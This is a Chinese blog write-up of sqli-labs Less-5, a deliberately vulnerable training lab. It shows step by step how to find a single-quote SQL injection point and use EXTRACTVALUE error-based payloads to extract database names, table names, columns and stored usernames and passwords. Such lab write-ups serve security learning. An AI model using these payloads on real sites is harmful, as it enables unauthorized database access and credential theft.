sqli-labs靶场第五关less-5

sqli-labs less-5

本次测试由虚拟机搭建靶场,主机浏览器中基于hackbar插件进行测试

1、确定注入点及注入类型

输入:

http://192.168.128.3/sq/Less-5/?id=1

http://192.168.128.3/sq/Less-5/?id=2

发现页面回显都一致,

输入

http://192.168.128.3/sq/Less-5/?id=1'

页面回显报错

从报错判断多了个 ' ,确定闭合为*' '* ,

2、确定列数

输入

http://192.168.128.3/sq/Less-5/?id=1' order by 5--+

http://192.168.128.3/sq/Less-5/?id=1' order by 4--+

http://192.168.128.3/sq/Less-5/?id=1' order by 3--+

发现5,4都报错,3的时候页面回显与之前一致,确定由三列

3、确定回显位

http://192.168.128.3/sq/Less-5/?id=1' union select 1,2,3--+

无回显,结合前面出现的单引号与确定列数页面出现报错可判断出,此关可使用报错注入

本次我使用 EXTRACTVALUE() 函数进行报错注入。

函数原型

EXTRACTVALUE(xml_data, xpath_expression)

extractvalue()函数原理可参考我写的另外一篇文章
报错注入函数基础知识详解

或者另外一位博主讲的:sql注入之报错注入

使用报错注入确定回显

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select database()))),3--+

  • 0x7e转码后为 ~ ,加入~目的是为了让后面的路径故意报错

使用了extractvalue函数,将xml数据设置为1,xpath_expression部分设置为concat(0x7e,(select database())

此时的xpath_expression为"~数据库名",由于1中并没有"~数据库名"因此会产生报错,可以从报错结果中看到我们想要的数据库名

故此查询到数据库名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select version()))),3--+

  • 版本名

3、爆出所有数据库名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3--+

**由此爆出了数据库名,但是由于此报错注入一次返回的字符只能由32位,这时我们可以借助substring函数

例如:select substring(123456,1,3);

输出 123

于是我们可以使用

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),1,30))),3--+

来显示从第一个字符开始的前三十个,然后使用

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),30,30))),3--+

发现还没有显示完全,接着

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(schema_name) from information_schema.schemata)),60,30))),3--+

显示完整,三次报错显示结果如下:

得到完整的数据库

4、爆出security的所有表名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),1,30))),3--+

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(table_name) from information_schema.tables where table_schema=database())),30,30))),3--+

得到想要的表名 users

5、爆出列名

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1,30))),3--+

6、爆出数据

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,' ',password) from security.users)),1,30))),3--+

http://192.168.128.3/sq/Less-5/?id=1' union select 1,extractvalue(1,concat(0x7e,substring(((select group_concat(username,' ',password) from security.users)),30,30))),3--+

剩下数据显示出来与上面同理
至此,大功告成

相关推荐
WTT00117 分钟前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
前端小小王11 分钟前
React Hooks
前端·javascript·react.js
迷途小码农零零发20 分钟前
react中使用ResizeObserver来观察元素的size变化
前端·javascript·react.js
了一li38 分钟前
Qt中的QProcess与Boost.Interprocess:实现多进程编程
服务器·数据库·qt
娃哈哈哈哈呀42 分钟前
vue中的css深度选择器v-deep 配合!important
前端·css·vue.js
码农君莫笑1 小时前
信管通低代码信息管理系统应用平台
linux·数据库·windows·低代码·c#·.net·visual studio
旭东怪1 小时前
EasyPoi 使用$fe:模板语法生成Word动态行
java·前端·word
别致的影分身1 小时前
使用C语言连接MySQL
数据库·mysql
ekskef_sef3 小时前
32岁前端干了8年,是继续做前端开发,还是转其它工作
前端
群联云防护小杜3 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡